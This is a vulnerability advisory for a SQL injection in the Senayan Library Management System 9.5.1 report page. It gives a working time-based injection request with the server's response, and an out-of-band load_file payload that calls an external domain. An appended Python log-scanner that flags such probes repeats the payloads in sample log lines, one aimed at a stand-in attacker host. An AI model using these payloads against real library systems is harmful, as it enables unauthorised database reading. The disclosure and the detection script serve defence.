## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi
## Author: nu11secur1ty
## Date: 12.06.2022
## Vendor: https://slims.web.id/web/
## Software: https://slims.web.id/web/news/rilis-9.5.1/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1

## Description:
The manual insertion `point 4` (the `class` parameter of `admin/modules/reporting/customs/loan_by_class.php`) appears to be vulnerable to SQL injection. During testing, the payload `'+(select load_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'` was submitted at that insertion point. It injects a SQL sub-query that calls MySQL's `load_file` function with a UNC path referencing an external domain; the application interacted with that domain, which shows that the injected query was executed by the database server. The request below uses a time-based variant of the same injection (`sleep(5)`) in the `class` parameter. An attacker can use such a `subquery` to read very sensitive information from the database.

## STATUS: HIGH Vulnerability

[+] Payload:

```http
GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaa HTTP/1.1
Host: pwnedhost.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1; SenayanMember=schm4nbtgbb5i1tbeonr6cav3u
Connection: close
```

[+] Response:

```http
HTTP/1.1 200 OK
Date: Tue, 06 Dec 2022 13:51:38 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4120
Connection: close
Content-Type: text/html; charset=UTF-8

Loan Report by Class Report
Loan Recap By Class bbbb'+(select*from(select(sleep(5)))a)+' for year 2002 Print Current PageExport to spreadsheet format Show in chart/plot
ClassificationJanFebMarAprMayJunJulAugSepOctNovDec
bbbb'+(select*from(select(sleep(5)))a)+'00000000000000
bbbb'+(select*from(select(sleep(5)))a)+'00000000000000
bbbb'+(select*from(select(sleep(5)))a)+'10000000000000
bbbb'+(select*from(select(sleep(5)))a)+'20000000000000
bbbb'+(select*from(select(sleep(5)))a)+'30000000000000
bbbb'+(select*from(select(sleep(5)))a)+'40000000000000
bbbb'+(select*from(select(sleep(5)))a)+'50000000000000
bbbb'+(select*from(select(sleep(5)))a)+'60000000000000
bbbb'+(select*from(select(sleep(5)))a)+'70000000000000
bbbb'+(select*from(select(sleep(5)))a)+'80000000000000
bbbb'+(select*from(select(sleep(5)))a)+'90000000000000
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)

## Proof and Exploit:
[href](https://streamable.com/gthu91)

## Time spent: `04:00:00`
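The injected value travels URL-encoded (`%27%2b(select...`), so a defender watching web-server logs for this class of probe has to decode each query parameter before matching. The following script is an added example, not part of the advisory or of the SLiMS project: it parses constructed Apache-style access-log lines modelled on the request above (the path and parameter names `class`, `year`, `membershipType`, `collType` come from the advisory; the client IPs, timestamps and the `attacker.example` hostname are made up), URL-decodes every parameter, and flags values that carry time-based (`sleep`, `benchmark`), file-read (`load_file`), string-break sub-query or `UNION` patterns.

```python
"""Flag web requests whose query parameters carry SQL-injection probes.

Added example (not part of the advisory). The log lines below are constructed;
only the path and parameter names are taken from the advisory's request.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (Apache common log format, simplified).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Dec/2022:13:51:33 +0000] "GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaa HTTP/1.1" 200 4120
10.0.0.6 - - [06/Dec/2022:13:52:01 +0000] "GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=300&membershipType=a&collType=aaaa HTTP/1.1" 200 3980
10.0.0.7 - - [06/Dec/2022:13:52:10 +0000] "GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=abc%27%2b(select%20load_file(%27%5C%5C%5C%5Cattacker.example%5C%5Cx%27))%2b%27&membershipType=a&collType=aaaa HTTP/1.1" 200 4120
"""

# ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Ordered: the first matching label is reported for a parameter.
PROBE_PATTERNS = [
    ("time-based subquery", re.compile(r"\bsleep\s*\(", re.I)),
    ("time-based benchmark", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("file read / out-of-band", re.compile(r"\bload_file\s*\(", re.I)),
    ("string-break subquery", re.compile(r"'\s*\+\s*\(\s*select\b", re.I)),
    ("union injection", re.compile(r"\bunion\b.+\bselect\b", re.I)),
]


def decode_params(target):
    """Return (path, [(name, value)]) with values URL-decoded.

    parse_qsl decodes once; a second unquote() pass normalises
    double-encoded payloads (unquote, not unquote_plus, so that a
    decoded '+' is not turned into a space).
    """
    parts = urlsplit(target)
    params = [(name, unquote(value))
              for name, value in parse_qsl(parts.query, keep_blank_values=True)]
    return parts.path, params


def scan_request(target):
    """Return [(param, label, decoded_value)] for each suspicious parameter."""
    _, params = decode_params(target)
    hits = []
    for name, value in params:
        for label, pattern in PROBE_PATTERNS:
            if pattern.search(value):
                hits.append((name, label, value))
                break  # one label per parameter is enough for triage
    return hits


def scan_log(text):
    """Parse access-log lines and return an alert dict per flagged request."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # unparseable line; skip rather than guess
        hits = scan_request(match.group("target"))
        if hits:
            alerts.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "path": urlsplit(match.group("target")).path,
                "hits": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for param, label, value in alert["hits"]:
            print(f'{alert["ts"]} {alert["ip"]} {alert["path"]} '
                  f'param={param} [{label}]: {value}')
```

Running it flags the first and third constructed lines (the `class` parameter in both) and leaves the ordinary `class=300` request alone. The patterns are deliberately narrow so the script is usable as a triage filter; in production the same decoding step should feed a proper WAF or SIEM rule set, and the real fix on the application side is to bind `class` and the other report filters as prepared-statement parameters rather than concatenating them into the query.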